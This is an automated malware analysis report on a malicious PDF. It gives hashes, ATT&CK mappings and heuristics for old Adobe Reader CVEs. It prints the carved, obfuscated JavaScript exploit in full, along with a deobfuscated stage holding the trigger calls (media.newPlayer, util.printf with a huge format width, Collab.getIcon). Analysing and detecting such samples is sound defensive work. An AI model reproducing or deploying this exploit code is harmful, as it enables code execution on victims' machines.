Malicious PDF — malware analysis report

Static analysis result for SHA-256 19685b6a1359d71d…

MALICIOUS

PDF

7.1 KB Authoring application: Wezolokofecpo (via 05e4cNworeticakebi) First seen: 2026-05-09
MD5: caf1d07f6ef1d40068b53d88b9d86142 SHA-1: acbb2c0775b86b3297791ee8db9c48e2f9b941f5 SHA-256: 19685b6a1359d71df03ed00debb97e9e3f9db4bdcbf2b0a595de3d13cb4efa33
348 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF file contains obfuscated JavaScript that leverages multiple known Adobe Reader vulnerabilities, including CVE-2008-2992, CVE-2009-4324, and CVE-2009-0927. The script utilizes functions like Collab.getIcon, media.newPlayer, and util.printf, indicating an attempt to execute arbitrary code. This pattern is consistent with a malicious PDF designed to download and run a secondary payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9953

Heuristics 8

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT
    A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0x1342 2272 bytes
SHA-256: 437a5d40b54247c17dfb3ac60e39d3ecfad672a269694af1851a077d9726a8d2
Preview script
First 1,000 lines of the extracted script
var uHQD = null;try {var nM=/[9k~&]/g;var xMT="len"+"gth";var dYZ=0;var gNCL="va~r& ~o&J~AkJ~=9tkhkiks~.~z9K~R9;&dkG9=k\'&gke~tkP&a9g~ekN&\'k;&ikV~U~Z&=kd~Gk+9\'kt9hkW9o&r&d9\'k;9l&=9d~G&+9\'~ukmkW~o9r9dksk\'&;&tkO9B9=~\'&p9a~gke9N9u9mk\'k;&h9G&H& &=9 ~7k8k 9;kv~GkTk=9\'&\'~;kh9GkT9=k\'9jko9i&n9\'&;~ekXkK&Z&=k\'k\'~;9d&Y~Z9=&0&;&x~K&N~=kSktkrki~n&gk;&t9WkJ&=&\'ks&ukbks9t&rk\'~;&l&U&Xk=k\'ke9v9aklk\'9;&xkMkT9=9\'~l9e~nkgktkh&\'9;~pkQ~X9=&\'&\\9\\kx~\'k;9n&=9\'kt~o&S9t&rki~nkg9\'&;&f~Q~Lk=~\'~pka9rks9ekIkn9t~\'k;~n&A9Zk=~\'9f&r9okm9C&hka9r~Cko9dkek\'k;&v~EkF9=~\'&c&h9akr9Cko9d&e9A9t&\'k;kx9QkR&=&49/&49;9f~I&T~=91~+k4~;9xkM~Z&=&2k0~0k+9595&;&j&W&X&=9\'&d~o~c9\'&;9lkO~F9=93k3~2&;kj~I&P~=~[~]9;9dkW~=k\'~\'k;~t9K9Z&=k196k;9z9I9Z9=k29;kr~G~Jk=94&;~t9I&D&=9o&J&A~Jk[~lk]k(kokJ&A~J~[kt&O~B9]9)9;kf&o&r&(~lkO&H~=kdkY9Z9;~lkO&H&<9 &tkIkD~;k ~l~O&H&+&+9)k{9v9akrk 9tkU~P~=&o~J&AkJ~[9i9VkUkZk]k(~o&JkA&J&[&tkO&B~]9,&lkO&H~,kt~r&uke~)k;kekX~K~Z~=&[ke~X9K~Zk,kt~UkP~]9[~h9G&T9]&(~v~GkT&)9;~;~}kf9o&r9(~l~O~H9=909;&l9O~H9 k<~ ke9X&K&Z9[&x9M9T9]9;~ &l&O9H9+~=9z~I~Z&)9{~lkC&T&=~e&XkK9Z~[9t9W~J9]~(~l&O~H9,&z~I9Z&)&;&l9U9P9=kpka&r&s&e~I&n&t9(9l~C&T&,kt&KkZk)~;kzkGkXk=klkU&P9^9h~G&H&;~l~G&Vk=~zkG&X9.9t9okS9t~r~i&n&g9(&t&KkZ9)9;&l9G~V9=9(&l~G&Vk[~xkM9Tk]9=k=9x~Q~R9)k &?k k\'k09\'k 9+k ~l~G&V~ &:& kl~G&Vk;kj9I~P&.kp9uks&h~(~l&G~V9)~;9}~t&r~y9 k{kd~Wk=kn9e~w9 kS&t9rki9n~g~(kp~Q9X~ 9+9 &j~IkP~[kh~GkTk]~(kp&Q&X9)9)9;9a&p&p~[~l&U&X9]k(9\'&d9Wk=~\"&\'9+9dkW~+k\'&\"9;~\'k)k;&o9J~AkJ~.&z&Y~L9=k(&d~W9[~tkW~J&]k(&d~W~[&xkM~T9]&-~l~OkF9)9)~;&o9J9A~Jk.kz9I&L&=k(&d&W9[9t~W&Jk]~(kd9Y&Zk,kdkWk[9x~MkT&]k-&lkO9F~)~)k;kz9G&T&(k)~;k}9 &ckakt&c9h&(kz&YkV9)~{&i&f~(&o9J9A&J9.kzkI~Lk)~{&t9r9yk k{ka&pkp~[&l~U&Xk]&(ko9J&A&J&.9z&IkLk)9;k}& &c~a~t9ckhk(~z9Y&V~)9{~akp&p~.9a&lkekr&tk(kz9Y&V9)k;&}9}~ ~ekl9s&e~ ~{&a~p9p~.kakl9e9r&t&(~\'~N9O& &C&O~D~E&\'~)9;9}9}9";var h=11+44;var xQR=2-1;function lOX(zUF){fSR='';for(lOH=zUF.length;lOH >=0;lOH--)fSR+=zUF.charAt(lOH);return fSR;}var jWX=this;var hQJ=new String("Func"+"tion");function jMX(zKD){this.zKR=zKD;this.dQZ=zKD;};;dOP=lOX("epy"+"tot"+"orp");gNCL=gNCL.replace(nM, '');lUX=lOX("lave");;jMX[dOP]={tUD : function(vWZ){if(vWZ > h){this.zKR[lUX](gNCL);} else {uHQD.tUD(vWZ+xQR);}},};var uHQD=new jMX(jWX);uHQD.tUD(dYZ);} catch(dW){app.alert(dW);}
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 153 bytes
SHA-256: 18699f9d55ae1f1fd22bc427d0f09ac790fd8fafb1557dc66370fe40318c5f52
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
/* getPageWords-XOR Pidief stage normalized */
app.viewerVersion;
Collab.getIcon("N."+unescape("%09"));
media.newPlayer(null);
util.printf("%45000f", 1);

Open this report in the interactive analyzer, or submit your own file for analysis.